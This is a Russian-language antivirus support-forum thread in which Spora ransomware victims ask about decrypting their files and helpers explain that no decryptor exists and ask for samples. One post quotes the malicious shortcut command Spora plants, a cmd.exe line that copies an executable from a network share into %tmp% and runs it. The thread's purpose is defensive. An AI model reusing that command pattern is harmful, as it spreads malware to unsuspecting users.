Поставщик ИТ-решений PRO32 сообщает вам, что после 17 лет сотрудничества мы более не являемся
эксклюзивным дистрибьютором программных продуктов словацкого разработчика ESET в России,
Республике Беларусь, Казахстане, Азербайджане, Узбекистане, Кыргызстане, Таджикистане, Туркменистане,
Молдове, Грузии и Армении.
Купить и продлить лицензии ESET на нашем сайте больше нельзя.
Предлагаем вам попробовать новый антивирус от компании
PRO32.
Продукты PRO32 — это технологичные решения, надежная защита от киберугроз
и максимальная производительность устройств на Windows / Android.
Для действующих клиентов ESET мы предлагаем промокод на скидку в размере
15% — ESET15. Скопируйте его и после добавления товара в корзину, не забудьте его
применить в корзине.
Попались на данный шифровальщик (шифрует файлы microsoft office: doc, docx, xls, xlsx) Может кто с ним сталкивался - возможно ли расшифровать файлы без оплаты ?
расшифровки файлов, зашифрованных данным вариантом шифратора Spora на текущий момент нет. Восстановление документов возможно в данный момент только из архивных или теневых копий.
добавьте на форум в ваше сообщение несколько зашифрованных документов.
если нет архивных копий, сохраните важные документы на отдельный носитель, возможно в будущем расшифровка документов станет возможной.
santy написал: анализ файла автозагрузки актуален и для вас. чтобы в системе не осталось активных тел шифратора. все сообщения будут перенесены в общую тему по данному шифратору. https://forum.esetnod32.ru/forum35/topic13782/
Пришел ответ, что на данный момент спора - новый вирус, и дешифратора нет. Значит, будем ждать. Также отправил ответом на почту все запрошенные вчерашним письмом документы: - 10 примеров документов - Тело вируса в архиве с паролем infected - Образ автозагрузки сделанный ПО в вашей подписи - key файл, созданный вирусом Буду периодически проверять почту и данную тему, может со временем найдется решение
собственно, после завершения шифрования в автозапуске остается только html-записка о выкупе (не представляет угрозы).
по очистке системы выполните:
выполняем скрипт в uVS: - скопировать содержимое кода в буфер обмена; - стартуем uVS(start.exe), далее выбираем: текущий пользователь, меню - скрипты - выполнить скрипт из буфера обмена; - закрываем все браузеры перед выполнением скрипта; при деинсталляции программ - соглашаемся на деинсталляцию_удаление подтверждаем "да"
перезагрузка, пишем о старых и новых проблемах. ------------ расшифровка в данном случае, (как и с VAULT) видимо, возможна в том случае, если будет получен доступ к приватным ключам мошенников.
Здравствуйте! Словили странный шифровальщик. Ни чего не требует, расширение не менялось, ни каких текстовых файлов с содержанием нет. Файлы офиса и медиа не открываются. Чем сможете помочь? Пример зашифрованного файла:
если сохранился источник шифратора: ссылка, или вложение из электронного сообщения - вышлите в почту [email protected] в архиве rar, с паролем infected
судя по образу, каких то следов шифрования, работы шифратора (уже) нет.
globe3 не подошел?
если сохранился источник шифратора: ссылка, или вложение из электронного сообщения - вышлите в почту [email protected] в архиве rar, с паролем infected
Создались ярлыки вместо папок папки скрылись, содержимое папок не открывается. Расширения стандартные. в ярлыках пути такие C:\Windows\system32\cmd.exe /c explorer.exe "\\PARIZH_SERVER\Документы\itmaster" & type "\\PARIZH_SERVER\Документы\0b42f998-8c83-9c3e-bbc6-fda4f022ba24.exe" > "%tmp%\0b42f998-8c83-9c3e-bbc6-fda4f022ba24.exe" & start "\\PARIZH_SERVER\Документы\itmaster" "%tmp% Сам файл прикреплен
собственно, скрытие папок в корне диска - один из симптомов Spora. Второй признак, это создание ярлыков, с запуском файлика Spora. третий признак - это шифрование файла без изменения расширения. трудно сказать почему не вышло html сообщение от Spora, возможно процесс шифрования не был завершен.
вообще, файл отправлен на VT два дня назад, должен был попасть в сигнатуры. First submission 2017-01-16 05:35:58 UTC (2 дней, 1 час назад) + добавьте лог журнала обнаружения угроз: http://forum.esetnod32.ru/forum9/topic1408/
-------- расшифровка по SPora в настоящее время в антивирусных компаниях невозможна.
(Не очень) добрый день. поймали сегодня этот же шивровальщик. ухнулись все документы. антивирусник промолчал. и при проверке вирусного ЕХЕ-шника тоже молчит утилита от ВЕБера только определяет его как Trojan.Inject2.41264 Имею пока в наличии и само исходное письмо, и результаты его действия файлы .HTA .EXE .HTML .LST .KEY могу достать зашифрованный и не зашифрованный документ.
есть ли какие действующие лекарства от данной гадости? и главное есть ли - способ вернуть документы?